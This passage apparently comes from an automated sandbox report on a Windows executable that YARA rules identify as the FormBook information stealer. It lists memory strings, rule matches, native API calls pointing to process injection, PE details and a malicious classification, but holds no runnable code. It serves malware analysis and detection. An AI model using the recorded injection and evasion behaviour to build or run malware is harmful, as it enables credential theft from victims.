          Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: 9thuIDnsFV.exe, 00000001.00000003.342672431.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmm
          Source: 9thuIDnsFV.exe, 00000001.00000003.331470049.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.k)
          Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: 9thuIDnsFV.exe, 00000001.00000003.331326853.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr-c(
          Source: 9thuIDnsFV.exe, 00000001.00000003.331326853.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.krtp
          Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: 9thuIDnsFV.exeString found in binary or memory: http://www.opera.com0
          Source: 9thuIDnsFV.exe, 00000001.00000003.328448785.0000000006152000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: 9thuIDnsFV.exe, 00000001.00000003.328448785.0000000006152000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comG
          Source: 9thuIDnsFV.exe, 00000001.00000003.328448785.0000000006152000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comM
          Source: 9thuIDnsFV.exe, 00000001.00000003.336235888.0000000006173000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: 9thuIDnsFV.exe, 00000001.00000003.331470049.000000000616B000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: 9thuIDnsFV.exe, 00000001.00000003.331326853.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krFc
          Source: 9thuIDnsFV.exe, 00000001.00000003.331326853.000000000616B000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krs-czom
          Source: explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: 9thuIDnsFV.exe, 00000001.00000003.333190214.0000000006173000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com-jpL
          Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: 9thuIDnsFV.exe, 00000001.00000003.338500432.0000000006171000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.341292306.0000000006177000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: 9thuIDnsFV.exe, 00000001.00000003.338500432.0000000006171000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de0
          Source: 9thuIDnsFV.exe, 00000001.00000003.341330812.0000000006178000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de?
          Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: 9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: 9thuIDnsFV.exe, 00000001.00000003.333715053.000000000616D000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cncr
          Source: 9thuIDnsFV.exe, 00000001.00000003.333587115.000000000616D000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnr-fC
          Source: 9thuIDnsFV.exeString found in binary or memory: https://www.digicert.com/CPS0

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.2.9thuIDnsFV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.9thuIDnsFV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 10.2.9thuIDnsFV.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.9thuIDnsFV.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.9thuIDnsFV.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.9thuIDnsFV.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_00419D60 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_00419E10 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_00419E90 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_00419D5A NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_00419DB2 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_00419E8A NtClose,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E99D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E95F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019EAD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019EB040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019EA3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9FE0 NtCreateMutant,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019EA710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019EA770 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E96D0 NtCreateKey,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F29E90 NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F29E10 NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F29F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F29D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F29E8A NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F29DB2 NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F29D5A NtCreateFile,
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeCode function: 1_2_0322C224
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeCode function: 1_2_0322E5E2
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeCode function: 1_2_0322E5F0
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_0041E004
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_00401027
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_0041D0C1
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_0041D3B9
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_00409E40
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D2581
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019BD5E0
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019AF900
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A0D20
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019C4120
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A71D55
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019BB090
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D20A0
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B841F
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A61002
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019DEBB0
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019C6E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F2E004
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F19E40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F12FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F12D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F12D87
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: String function: 019AB150 appears 35 times
          Source: 9thuIDnsFV.exeStatic PE information: invalid certificate
          Source: 9thuIDnsFV.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 9thuIDnsFV.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 9thuIDnsFV.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 9thuIDnsFV.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 9thuIDnsFV.exeBinary or memory string: OriginalFilename vs 9thuIDnsFV.exe
          Source: 9thuIDnsFV.exe, 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAucrorbejpjpqs.dll> vs 9thuIDnsFV.exe
          Source: 9thuIDnsFV.exe, 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameElcbrjrgopuwq.dll" vs 9thuIDnsFV.exe
          Source: 9thuIDnsFV.exe, 00000001.00000002.421855584.0000000000E82000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAAXZConsoleApp9.exeB vs 9thuIDnsFV.exe
          Source: 9thuIDnsFV.exe, 00000001.00000002.428503196.0000000006320000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs 9thuIDnsFV.exe
          Source: 9thuIDnsFV.exeBinary or memory string: OriginalFilename vs 9thuIDnsFV.exe
          Source: 9thuIDnsFV.exe, 0000000A.00000000.421133231.0000000000F42000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAAXZConsoleApp9.exeB vs 9thuIDnsFV.exe
          Source: 9thuIDnsFV.exe, 0000000A.00000002.498789895.0000000001DC2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs 9thuIDnsFV.exe
          Source: 9thuIDnsFV.exe, 0000000A.00000002.498552872.0000000001C2F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 9thuIDnsFV.exe
          Source: 9thuIDnsFV.exeBinary or memory string: OriginalFilenameAAXZConsoleApp9.exeB vs 9thuIDnsFV.exe
          Source: 9thuIDnsFV.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 10.2.9thuIDnsFV.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.9thuIDnsFV.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.9thuIDnsFV.exe.45b0350.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.9thuIDnsFV.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.9thuIDnsFV.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.9thuIDnsFV.exe.45140c8.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.425318748.0000000004349000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.498621815.0000000001CB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.425393172.00000000043C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.496854769.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.594295138.0000000000430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.498662649.0000000001CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9thuIDnsFV.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: 9thuIDnsFV.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@1/1
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9thuIDnsFV.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3860:120:WilError_01
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeFile created: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeJump to behavior
